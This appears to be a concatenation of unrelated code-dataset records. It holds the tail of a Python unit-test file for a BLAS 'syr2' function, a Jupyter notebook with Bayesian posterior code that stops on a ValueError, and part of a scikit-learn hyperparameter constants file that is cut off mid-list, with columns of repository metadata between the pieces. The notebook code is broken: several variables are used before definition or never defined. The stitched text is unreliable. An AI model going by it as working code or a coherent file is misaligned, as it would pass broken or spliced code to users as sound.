self.assertListEqual(A.tolist(), expected)
def test_as_matrix_mixed_no_A(self):
x = asmatrix(array([[1.],
[2.]]))
y = array([[3.],
[4.]])
expected = [[6., 10.],
[0., 16.]]
self.assertListEqual(syr2(x, y).tolist(), expected)
def test_strides_less_than_length_provide_A(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.],
[3.],
[4.]])
y = array([[3.],
[4.],
[5.],
[6.]])
expected = [[7., 16.],
[2., 33.]]
self.assertListEqual(syr2(x, y, A, inc_x=2, inc_y=2).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_strides_less_than_length_no_A(self):
x = array([[1.],
[2.],
[3.],
[4.]])
y = array([[3.],
[4.],
[5.],
[6.]])
expected = [[6., 14.],
[0., 30.]]
self.assertListEqual(syr2(x, y, inc_x=2, inc_y=2).tolist(), expected)
def test_strides_greater_than_length_provide_A(self):
A = array([[3.]])
x = array([[1.],
[2.],
[3.],
[4.]])
y = array([[3.],
[4.],
[5.],
[6.]])
expected = [[9.]]
self.assertListEqual(syr2(x, y, A, inc_x=4, inc_y=4).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_unequal_strides(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.],
[3.],
[4.]])
y = array([[3.],
[5.]])
expected = [[7., 16.],
[2., 33.]]
self.assertListEqual(syr2(x, y, A, inc_x=2, inc_y=1).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_float32_dtype(self):
A = array([[1., 2.],
[2., 3.]], dtype='float32')
x = array([[1.],
[2.]], dtype='float32')
y = array([[3.],
[4.]], dtype='float32')
self.assertEqual(A.dtype, 'float32')
self.assertEqual(x.dtype, 'float32')
self.assertEqual(y.dtype, 'float32')
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_float64_dtype(self):
A = array([[1., 2.],
[2., 3.]], dtype='float64')
x = array([[1.],
[2.]], dtype='float64')
y = array([[3.],
[4.]], dtype='float64')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'float64')
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_not_numpy_with_list_for_A_raises_ValueError(self):
A = [[1., 2.],
[3., 4.]]
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_list_for_x_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = [[1.],
[2.]]
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_list_for_y_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = array([[1.],
[2.]])
y = [[3.],
[4.]]
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_scalar_for_A_raises_ValueError(self):
A = 1.
x = array([[1.]])
y = array([[3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_scalar_for_x_raises_ValueError(self):
A = array([[1.]])
x = 1.
y = array([[3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_scalar_for_y_raises_ValueError(self):
A = array([[1.]])
x = array([[1.]])
y = 3.
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_1d_for_A_raises_ValueError(self):
A = array([1., 2., 2., 1.])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_1d_for_x_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = array([1., 2.])
y = array([[3., 4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_1d_for_y_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = array([[1., 2.]])
y = array([3., 4.])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_3d_for_A_raises_ValueError(self):
A = array([[[1., 2.],
[2., 3.]]], ndmin=3)
x = array([[1.],
[2.]])
y = array([[3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_3d_for_x_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[[1., 2.]]], ndmin=3)
y = array([[3., 4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_3d_for_y_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1., 2.]])
y = array([[[3., 4.]]], ndmin=3)
self.assertRaises(ValueError, syr2, x, y, A)
def test_nonconforming_x_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.],
[3.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_nonconforming_y_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_non_square_A_raises_ValueError(self):
A = array([[1., 2., 3.],
[2., 3., 4.]])
x = array([[1.],
[2.],
[3.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_nonconforming_x_with_strides_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A, 'u', 1., None, 2)
def test_nonconforming_y_with_strides_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A, 'u', 1., None, 1, 2)
def test_not_vector_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1., 2.],
[2., 3.]])
y = array([[1., 2.],
[2., 3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_mixed_dtypes_A_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float32')
x = array([[1.],
[2.]], dtype='float64')
y = array([[3.],
[4.]], dtype='float64')
self.assertEqual(A.dtype, 'float32')
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'float64')
self.assertRaises(ValueError, syr2, x, y, A)
def test_mixed_dtypes_x_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float64')
x = array([[1.],
[2.]], dtype='float32')
y = array([[3.],
[4.]], dtype='float64')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(x.dtype, 'float32')
self.assertEqual(y.dtype, 'float64')
self.assertRaises(ValueError, syr2, x, y, A)
def test_mixed_dtypes_y_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float64')
x = array([[1.],
[2.]], dtype='float64')
y = array([[3.],
[4.]], dtype='float32')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'float32')
self.assertRaises(ValueError, syr2, x, y, A)
def test_integer_dtype_for_all_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='int')
x = array([[1.],
[2.]], dtype='int')
y = array([[3.],
[4.]], dtype='int')
self.assertEqual(A.dtype, 'int')
self.assertEqual(x.dtype, 'int')
self.assertEqual(y.dtype, 'int')
self.assertRaises(ValueError, syr2, x, y, A)
def test_complex_dtype_for_all_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='complex')
x = array([[1.],
[2.]], dtype='complex')
y = array([[3.],
[4.]], dtype='complex')
self.assertEqual(A.dtype, 'complex')
self.assertEqual(x.dtype, 'complex')
self.assertEqual(y.dtype, 'complex')
self.assertRaises(ValueError, syr2, x, y, A)
def test_invalid_values_for_uplo_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
for char in ascii_letters:
if char not in ('u', 'U', 'l', 'L'):
self.assertRaises(ValueError, syr2, x, y, A, char)
| 31.725
| 80
| 0.441095
| 1,742
| 15,228
| 3.696326
| 0.076349
| 0.07175
| 0.076099
| 0.042398
| 0.872962
| 0.848579
| 0.84128
| 0.815344
| 0.787234
| 0.711912
| 0
| 0.0629
| 0.374639
| 15,228
| 480
| 81
| 31.725
| 0.613252
| 0.017993
| 0
| 0.725926
| 0
| 0
| 0.01876
| 0
| 0
| 0
| 0
| 0
| 0.197531
| 1
| 0.108642
| false
| 0
| 0.009877
| 0
| 0.120988
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d37bc5d551d90e8e56e0fc80956d0f83e55b33dc
| 7,742
|
py
|
Python
|
mean.py
|
jpacuna99/AcunaJuan_ejercicio06
|
0de50eb3558b4dbf1d5664f667201d37a1957741
|
[
"MIT"
] | null | null | null |
mean.py
|
jpacuna99/AcunaJuan_ejercicio06
|
0de50eb3558b4dbf1d5664f667201d37a1957741
|
[
"MIT"
] | null | null | null |
mean.py
|
jpacuna99/AcunaJuan_ejercicio06
|
0de50eb3558b4dbf1d5664f667201d37a1957741
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"ename": "ValueError",
"evalue": "operands could not be broadcast together with shapes (4,) (100,) (4,) ",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mValueError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-13-5f28594dbd6a>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[1;32m 38\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 39\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 40\u001b[0;31m \u001b[0mmaximo\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0msigma\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mmaximo_sigma\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mprior\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mposterior\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 41\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 42\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m<ipython-input-13-5f28594dbd6a>\u001b[0m in \u001b[0;36mposterior\u001b[0;34m(H, secuencia)\u001b[0m\n\u001b[1;32m 21\u001b[0m \u001b[0mPosterior\u001b[0m \u001b[0mcalculado\u001b[0m \u001b[0mcon\u001b[0m \u001b[0mla\u001b[0m \u001b[0mnormalizacion\u001b[0m \u001b[0madecuada\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 22\u001b[0m \"\"\"\n\u001b[0;32m---> 23\u001b[0;31m \u001b[0mpost\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mlike\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0msigma\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m)\u001b[0m \u001b[0;34m+\u001b[0m \u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mlog\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mprior\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 24\u001b[0m \u001b[0mevidencia\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mamax\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mpost\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 25\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexp\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mpost\u001b[0m\u001b[0;34m-\u001b[0m\u001b[0mevidencia\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m/\u001b[0m\u001b[0mtrapz\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexp\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mpost\u001b[0m\u001b[0;34m-\u001b[0m\u001b[0mevidencia\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m<ipython-input-13-5f28594dbd6a>\u001b[0m in \u001b[0;36mlike\u001b[0;34m(secuencia, sigma, mu)\u001b[0m\n\u001b[1;32m 14\u001b[0m \u001b[0mL\u001b[0m\u001b[0;34m=\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mzeros\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mlen\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 15\u001b[0m \u001b[0;32mfor\u001b[0m \u001b[0mi\u001b[0m \u001b[0;32min\u001b[0m \u001b[0mrange\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mlen\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 16\u001b[0;31m \u001b[0mL\u001b[0m \u001b[0;34m+=\u001b[0m \u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mlog\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;36m1.\u001b[0m\u001b[0;34m/\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0msqrt\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;36m2.0\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mpi\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0msigma\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mi\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m**\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexp\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m-\u001b[0m\u001b[0;36m0.5\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0msecuencia\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mi\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m-\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m**\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m/\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0msigma\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mi\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m**\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 17\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0mL\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 18\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;31mValueError\u001b[0m: operands could not be broadcast together with shapes (4,) (100,) (4,) "
]
}
],
"source": [
"\n",
"import numpy as np\n",
"import matplotlib.pyplot as plt\n",
"x =[4.6, 6.0, 2.0, 5.8] \n",
"x=np.array(x)\n",
"sigma =[2.0, 1.5, 5.0, 1.0]\n",
"mu=np.array(mu)\n",
"mu=np.linspace(10,-10,100)\n",
"\n",
"def prior(a):\n",
" p=np.ones(len(a))\n",
" return p\n",
"\n",
"def like(secuencia, sigma,mu):\n",
" L=np.zeros(len(x))\n",
" for i in range(len(x)):\n",
" L += np.log(1./np.sqrt(2.0*np.pi*sigma[i]**2))*np.exp(-0.5*(secuencia[i]-mu)**2/(sigma[i]**2))\n",
" return L\n",
"\n",
"def posterior(H, secuencia):\n",
" \"\"\"\n",
" Posterior calculado con la normalizacion adecuada\n",
" \"\"\"\n",
" post = like(x, sigma,mu) + np.log(prior(mu))\n",
" evidencia = np.amax(post)\n",
" return np.exp(post-evidencia)/trapz(np.exp(post-evidencia),mu)\n",
" \n",
"\n",
"def maximo_sigma(x, y):\n",
" deltax = x[1] - x[0]\n",
"\n",
" ii = np.argmax(y)\n",
"\n",
" # segunda derivada\n",
" d = (y[ii+1] - 2*y[ii] + y[ii-1]) / (deltax**2)\n",
"\n",
" return x[ii], 1.0/np.sqrt(-d)\n",
" \n",
"\n",
"\n",
"maximo, sigma = maximo_sigma(prior(x), posterior(mu,x))\n",
"\n",
"\n",
"\n",
"plt.figure()\n",
"plt.plot(H, post, label='datos={}'.format(secuencia))\n",
"plt.plot(H, gauss, ':', label='Aproximacion Gaussiana')\n",
"plt.title('H= {:.2f} $\\pm$ {:.2f}'.format(max, sigma))\n",
"plt.xlabel('H')\n",
"plt.ylabel('prob(H|datos)')\n",
"plt.legend()\n",
"plt.savefig('coins')"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.6"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| 72.35514
| 2,250
| 0.640532
| 1,397
| 7,742
| 3.539012
| 0.137437
| 0.302994
| 0.463592
| 0.299757
| 0.703479
| 0.681837
| 0.668083
| 0.658778
| 0.644215
| 0.644013
| 0
| 0.304924
| 0.113407
| 7,742
| 106
| 2,251
| 73.037736
| 0.415355
| 0
| 0
| 0.216981
| 0
| 0.018868
| 0.703048
| 0.461896
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.018868
| 0
| 0.018868
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6c942af2f0d312dcf04b3c392ee35946921207ed
| 22,803
|
py
|
Python
|
src/constants/model_params.py
|
Supreeth-Shetty/Projectathon---Simplified-AI
|
3fc26a58a9370d119811ac4e864af977c21f6c40
|
[
"MIT"
] | 8
|
2021-12-23T06:05:00.000Z
|
2021-12-26T05:39:00.000Z
|
src/constants/model_params.py
|
Supreeth-Shetty/Projectathon---Simplified-AI
|
3fc26a58a9370d119811ac4e864af977c21f6c40
|
[
"MIT"
] | null | null | null |
src/constants/model_params.py
|
Supreeth-Shetty/Projectathon---Simplified-AI
|
3fc26a58a9370d119811ac4e864af977c21f6c40
|
[
"MIT"
] | 2
|
2021-12-23T06:10:11.000Z
|
2021-12-23T07:24:28.000Z
|
LinearRegression_Params = [
{"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "positive", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False}
]
Ridge_Params = [
{"name": "alpha", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "copy_X", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "max_iter", "type": "input", "values": "", "dtype": "int", "accept_none": True},
{"name": "tol", "type": "input", "values": 0.001, "dtype": "float", "accept_none": False},
{"name": "solver", "type": "select",
"values": ["auto", "svd", "cholesky", "lsqr", "sparse_cg", "sag", "saga", "lbfgs"], "dtype": "string",
"accept_none": False},
{"name": "random_state", "type": "input", "values": "", "dtype": "int", "accept_none": True}
]
Lasso_Params = [
{"name": "alpha", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "precompute", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "copy_X", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "max_iter", "type": "input", "values": 1000, "dtype": "int", "accept_none": False},
{"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
{"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
{"name": "selection", "type": "select", "values": ["cyclic", "random", "auto"], "dtype": "string",
"accept_none": False}]
ElasticNet_Params = [
{"name": "alpha", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "l1_ratio", "type": "input", "values": 0.5, "dtype": "float", "accept_none": False},
{"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "precompute", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "max_iter", "type": "input", "values": 1000, "dtype": "int", "accept_none": False},
{"name": "copy_X", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
{"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
{"name": "selection", "type": "select", "values": ["cyclic", "random"], "dtype": "string", "accept_none": False}]
DecisionTreeRegressor_Params = [
{"name": "criterion", "type": "select", "values": ["squared_error", "friedman_mse", "absolute_error", "poisson"],
"dtype": "string", "accept_none": False},
{"name": "splitter", "type": "select", "values": ["best", "random"], "dtype": "string", "accept_none": False},
{"name": "max_depth", "type": "input", "values": "", "dtype": "int", "accept_none": True},
{"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
{"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
{"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
"accept_none": False},
{"name": "max_leaf_nodes", "type": "input", "values": "", "dtype": "int", "accept_none": True},
{"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True}
]
RandomForestRegressor_Params = [
{"name": "n_estimators", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
{"name": "criterion", "type": "select", "values": ["squared_error", "absolute_error", "poisson"], "dtype": "string",
"accept_none": False},
{"name": "max_depth", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
{"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
{"name": "min_samples_leaf", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
{"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
"accept_none": False},
{"name": "max_leaf_nodes", "type": "input", "values": 4, "dtype": "int", "accept_none": True},
{"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "bootstrap", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "oob_score", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True},
{"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
{"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
{"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "max_samples", "type": "input", "values": 1, "dtype": "float", "accept_none": True}]
SVR_params = [{"name": "kernel", "type": "select", "values": ["rbf", "linear", "poly", "sigmoid", "precomputed"],
"dtype": "string", "accept_none": False},
{"name": "degree", "type": "input", "values": 3, "dtype": "int", "accept_none": False},
{"name": "gamma", "type": "select", "values": ["scale", "auto"], "dtype": "string", "accept_none": False},
{"name": "coef0", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "tol", "type": "input", "values": 0.001, "dtype": "float", "accept_none": False},
{"name": "C", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "epsilon", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
{"name": "shrinking", "type": "select", "values": [True, False], "dtype": "boolean",
"accept_none": False},
{"name": "cache_size", "type": "input", "values": 200, "dtype": "float", "accept_none": False},
{"name": "verbose", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "max_iter", "type": "input", "values": -1, "dtype": "int", "accept_none": False}]
AdabootRegressor_Params = [
{"name": "base_estimator", "type": "input", "values": None, "dtype": "object", "accept_none": True},
{"name": "n_estimators", "type": "input", "values": 50, "dtype": "int", "accept_none": False},
{"name": "learning_rate", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "loss", "type": "select", "values": ['linear', 'square', 'exponential'], "dtype": "string",
"accept_none": False},
{"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True}]
GradientBoostRegressor_Params = [
{"name": "loss", "type": "select", "values": ['squared_error', 'absolute_error', 'huber', 'quantile'],
"dtype": "string", "accept_none": False},
{"name": "learning_rate", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
{"name": "n_estimators", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
{"name": "subsample", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "criterion", "type": "select", "values": ['friedman_mse', 'squared_error', 'mae', 'mse'],
"dtype": "string", "accept_none": False},
{"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
{"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
{"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "max_depth", "type": "input", "values": 3, "dtype": "int", "accept_none": False},
{"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
{"name": "init", "type": "input", "values": "zero", "dtype": "string", "accept_none": True},
{"name": "random_state", "input": "int", "values": 1, "dtype": "int", "accept_none": True},
{"name": "max_features", "type": "select", "values": ['auto', 'sqrt', 'log2'], "dtype": "string",
"accept_none": False},
{"name": "alpha", "type": "input", "values": 0.9, "dtype": "float", "accept_none": False},
{"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
{"name": "max_leaf_nodes", "type": "input", "values": 4, "dtype": "int", "accept_none": True},
{"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "validation_fraction", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
{"name": "n_iter_no_change", "type": "input", "values": 95, "dtype": "int", "accept_none": True},
{"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
{"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False}]
# -----------------------------------------------------------------------------------------------------------
# CLASSIFICATION -------------
LogisticRegression_Params = [
{"name": "penalty", "type": "select", "values": ['l2', 'l1', 'elasticnet', 'None'], "dtype": "string",
"accept_none": True},
{"name": "dual", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
{"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
{"name": "C", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
{"name": "intercept_scaling", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
{"name": "class_weight", "type": "select", "values": ["", 'balanced'], "dtype": "string", "accept_none": True},
{"name": "random_state", "type": "input", "values": 101, "dtype": "int", "accept_none": True},
